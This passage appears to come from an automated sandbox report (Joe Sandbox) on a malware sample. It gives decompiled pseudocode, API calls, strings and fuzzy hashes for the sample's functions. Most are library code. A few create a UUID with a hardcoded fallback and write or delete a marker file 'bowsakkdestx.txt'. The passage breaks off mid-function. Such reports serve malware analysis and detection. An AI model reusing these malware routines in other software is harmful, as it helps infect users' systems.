0x004141fb
0x00414204
0x0041420a
0x00414206
0x00414206
0x00414206
0x0041420e
0x00414215
0x0041423e
0x0041423e
0x0041420e
0x00414246
0x00414246
0x004141aa
0x00414253
0x00414253
0x0041418a

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t36;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_t48 = __ebp;
				_t1 =  &_a8; // 0x463743
				_t46 =  *_t1;
				_t2 =  &_a4; // 0x463743
				_t45 =  *_t2;
				_t39 =  *_t45;
				if( *_t45 >= _t46) {
					L3:
					 *_t45 = _t46;
					return _t46;
				} else {
					if( *(_t45 + 8) < _t46) {
						__eflags = _t46 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t17 =  *((intOrPtr*)(_t45 + 4));
							_push(__ebx);
							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
							__eflags = _t17;
							if(_t17 != 0) {
								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
							} else {
								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
							}
							_t44 = _t18;
							__eflags = _t44;
							if(__eflags != 0) {
								__eflags = _t46 -  *_t45;
								 *((intOrPtr*)(_t45 + 4)) = _t44;
								 *(_t45 + 8) = _t36;
								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
								 *_t45 = _t46;
								return _t46;
							} else {
								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
							__eflags = 0;
							return 0;
						}
					} else {
						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
						goto L3;
					}
				}
			}

0x0045ad50
0x0045ad51
0x0045ad51
0x0045ad56
0x0045ad56
0x0045ad5a
0x0045ad5e
0x0045ad7a
0x0045ad7a
0x0045ad80
0x0045ad60
0x0045ad63
0x0045ad81
0x0045ad87
0x0045adad
0x0045adb0
0x0045adb5
0x0045adb8
0x0045adba
0x0045add7
0x0045adbc
0x0045adc4
0x0045adc9
0x0045addf
0x0045ade1
0x0045ade3
0x0045ae06
0x0045ae08
0x0045ae11
0x0045ae15
0x0045ae1d
0x0045ae24
0x0045ade5
0x0045adf2
0x0045adfa
0x0045ae01
0x0045ae01
0x0045ad89
0x0045ad96
0x0045ad9e
0x0045ada2
0x0045ada2
0x0045ad65
0x0045ad72
0x00000000
0x0045ad77
0x0045ad63

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7
C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040C5C0(void* __ebx, char* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr* _v64;
				char _v72;
				intOrPtr _v76;
				void* __edi;
				char* _t19;
				intOrPtr _t24;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;
				char* _t43;

				_t31 = __ebx;
				_t19 =  &_v44;
				_v48 = 0;
				_t43 = __ecx;
				__imp__UuidCreate(_t19, _t39, _t42);
				if(_t19 != 0) {
					L9:
					_push(0x24);
					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t43 + 0x10)) = 0;
					 *_t43 = 0;
					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
					goto L10;
				} else {
					_v56 = _t19;
					__imp__UuidToStringA( &_v48,  &_v56);
					_t38 = _v64;
					if(_t38 == 0) {
						goto L9;
					} else {
						_v20 = 0xf;
						_v24 = 0;
						_v40 = 0;
						if( *_t38 != 0) {
							_t34 = _t38;
							_t39 = _t34 + 1;
							do {
								_t24 =  *_t34;
								_t34 = _t34 + 1;
							} while (_t24 != 0);
							_t35 = _t34 - _t39;
						} else {
							_t35 = 0;
						}
						E004156D0(_t31,  &_v40, _t39, _t38);
						__imp__RpcStringFreeA( &_v72, _t35);
						_v76 = 0;
						E00412CA0(_t43,  &_v52);
						if(_v36 < 0x10) {
							L10:
							return _t43;
						} else {
							L00422587(_v48);
							return _t43;
						}
					}
				}
			}

0x0040c5c0
0x0040c5cb
0x0040c5cf
0x0040c5d8
0x0040c5da
0x0040c5e2
0x0040c675
0x0040c675
0x0040c677
0x0040c680
0x0040c68c
0x0040c68f
0x00000000
0x0040c5e8
0x0040c5e8
0x0040c5f6
0x0040c5fc
0x0040c602
0x00000000
0x0040c604
0x0040c604
0x0040c60c
0x0040c614
0x0040c61c
0x0040c622
0x0040c624
0x0040c627
0x0040c627
0x0040c629
0x0040c62a
0x0040c62e
0x0040c61e
0x0040c61e
0x0040c61e
0x0040c636
0x0040c640
0x0040c64a
0x0040c655
0x0040c65f
0x0040c694
0x0040c69b
0x0040c661
0x0040c665
0x0040c674
0x0040c674
0x0040c65f
0x0040c602

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A2D(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x00437a31
0x00437a36
0x00437a5e
0x00000000
0x00437a8c
0x00437a7e
0x00437aaf
0x00000000
0x00437aaf
0x00000000
0x00437a80
0x00437aad
0x00000000
0x00000000
0x00437ab3
0x00437ab8
0x00437abc
0x00437abc
0x00437a85

APIs

_wcscmp.LIBCMT ref: 00437A44
_wcscmp.LIBCMT ref: 00437A55

Strings

OCP, xrefs: 00437A4F
ACP, xrefs: 00437A3E

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
				char _v264;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t17;
				CHAR* _t18;
				void* _t20;

				_t17 = __edx;
				_t4 =  &_v264;
				_t18 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t20 = E004220B6( &_v264, "w");
					__eflags = _t20;
					if(__eflags != 0) {
						_push(_t20);
						_push(lstrlenA(_t18));
						_push(1);
						_push(_t18);
						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
						_push(_t20);
						E00423A38(__ebx, _t18, _t20, __eflags);
						return 1;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c470
0x0040c479
0x0040c489
0x0040c48b
0x0040c493
0x0040c4a9
0x0040c4c0
0x0040c4c5
0x0040c4c7
0x0040c4d1
0x0040c4d9
0x0040c4da
0x0040c4dc
0x0040c4dd
0x0040c4e2
0x0040c4e3
0x0040c4f2
0x0040c4c9
0x0040c4ca
0x0040c4d0
0x0040c4d0
0x0040c495
0x0040c49b
0x0040c49b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E00420C62(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E0042793D(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00430D21(_t22,  &_v16);
						_v28 = 0x4cf748;
						E00430ECA( &_v28, 0x50793c);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x4cf748;
						E00430D91(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00422587(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x00423b4c
0x00423b4c
0x00423b4c
0x00423b61
0x00423b64
0x00423b6c
0x00000000
0x00000000
0x00423b5f
0x00423b72
0x00423b77
0x00423b7f
0x00423b82
0x00423b8f
0x00423b97
0x00423b9c
0x00423ba1
0x00423ba3
0x00423ba9
0x00423bb2
0x00423bb5
0x00423bba
0x00423bbf
0x00000000
0x00000000
0x00000000
0x00000000
0x00423b5f
0x00423b71
0x00000000

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA10(intOrPtr __ecx) {
				struct _WNDCLASSEXW _v52;

				_v52.cbSize = 0x30;
				_v52.style = 3;
				_v52.lpfnWndProc =  &M0041BAE0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = __ecx;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"LPCWSTRszWindowClass";
				_v52.hIconSm = 0;
				return RegisterClassExW( &_v52);
			}

0x0041ba1d
0x0041ba24
0x0041ba2b
0x0041ba32
0x0041ba39
0x0041ba40
0x0041ba43
0x0041ba50
0x0041ba57
0x0041ba5e
0x0041ba65
0x0041ba6c
0x0041ba7c

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32 ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C420() {
				char _v264;
				CHAR* _t4;

				_t4 =  &_v264;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					return DeleteFileA( &_v264);
				}
				return _t4;
			}

0x0040c429
0x0040c438
0x0040c440
0x0040c44e
0x00000000
0x0040c45b
0x0040c464

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00427C2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {

				_t15 = __eflags;
				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
				_t1 =  &_a4; // 0x423b69
				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
				E00427CEC(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E00427E0E(__ebx, __edi, __esi, _t15);
			}

0x00427c2e
0x00427c31
0x00427c36
0x00427c39
0x00427c44
0x00427c49
0x00427c4a
0x00427c4c
0x00427c4e
0x00427c58

APIs

__FF_MSGBANNER.LIBCMT ref: 00427C31

Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82

__NMSG_WRITE.LIBCMT ref: 00427C39

Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

_doexit.LIBCMT ref: 00427C50

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Strings

i;B, xrefs: 00427C36

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
String ID: i;B
API String ID: 2447380256-472376889
Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t82;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr* _t112;
				signed int _t116;
				intOrPtr* _t122;
				void* _t123;
				char* _t129;
				char* _t132;
				intOrPtr _t134;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t139;

				_push(0xffffffff);
				_push(0x4caa30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t138;
				_t139 = _t138 - 0x28;
				_push(_t132);
				_t136 = __ecx;
				_v8 = 0;
				_t82 = 0;
				_t112 = 0;
				_v20 = 0;
				if( &_v32 != __ecx) {
					_t82 =  *__ecx;
					 *__ecx = 0;
					_t112 =  *((intOrPtr*)(__ecx + 4));
					 *((intOrPtr*)(__ecx + 4)) = 0;
					_v20 = _t82;
					 *((intOrPtr*)(__ecx + 8)) = 0;
				}
				_v8 = 1;
				if(_t82 == 0) {
					L10:
					if(_a20 == 0) {
						L39:
						if(_a24 >= 0x10) {
							_t82 = L00422587(_a4);
							_t139 = _t139 + 4;
						}
						_a24 = 0xf;
						_a20 = 0;
						_a4 = 0;
						if(_a48 >= 0x10) {
							_t82 = L00422587(_a28);
						}
						 *[fs:0x0] = _v16;
						return _t82;
					}
					_t121 =  >=  ? _a28 :  &_a28;
					_push( >=  ? _a28 :  &_a28);
					_t84 =  >=  ? _a4 :  &_a4;
					_push( >=  ? _a4 :  &_a4);
					_t82 = E00421B3B();
					_t129 = _t82;
					_t139 = _t139 + 8;
					if(_t129 == 0) {
						goto L39;
					}
					do {
						_v36 = 0xf;
						_v40 = 0;
						_v56 = 0;
						if( *_t129 != 0) {
							_t122 = _t129;
							_t23 = _t122 + 1; // 0x1
							_t132 = _t23;
							do {
								_t85 =  *_t122;
								_t122 = _t122 + 1;
							} while (_t85 != 0);
							_t123 = _t122 - _t132;
							L18:
							_push(_t123);
							_t124 =  &_v56;
							E004156D0(_t112,  &_v56, _t132, _t129);
							_v8 = 3;
							_t134 =  *((intOrPtr*)(_t136 + 4));
							if( &_v56 >= _t134) {
								L28:
								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
									E00415230(_t112, _t136, _t134, _t124);
								}
								_t132 =  *((intOrPtr*)(_t136 + 4));
								if(_t132 != 0) {
									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t132 + 0x10)) = 0;
									 *_t132 = 0;
									if(_v36 >= 0x10) {
										 *_t132 = _v56;
										_v56 = 0;
									} else {
										_t95 = _v40 + 1;
										if(_v40 + 1 != 0) {
											E004205A0(_t132,  &_v56, _t95);
											_t139 = _t139 + 0xc;
										}
									}
									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
									_v36 = 0xf;
									_v40 = 0;
									_v56 = 0;
								}
								goto L36;
							}
							_t99 =  *_t136;
							_t124 =  &_v56;
							if(_t99 > _t124) {
								goto L28;
							}
							_t126 = _t124 - _t99;
							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
								E00415230(_t116, _t136, _t134, _t126);
							}
							_t112 =  *((intOrPtr*)(_t136 + 4));
							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
							if(_t112 != 0) {
								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t112 + 0x10)) = 0;
								 *_t112 = 0;
								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
									 *_t112 =  *_t132;
									 *_t132 = 0;
								} else {
									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
										E004205A0(_t112, _t132, _t107);
										_t139 = _t139 + 0xc;
									}
								}
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t132 + 0x10)) = 0;
								 *_t132 = 0;
							}
							goto L36;
						}
						_t123 = 0;
						goto L18;
						L36:
						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
						_v8 = 1;
						if(_v36 >= 0x10) {
							L00422587(_v56);
							_t139 = _t139 + 4;
						}
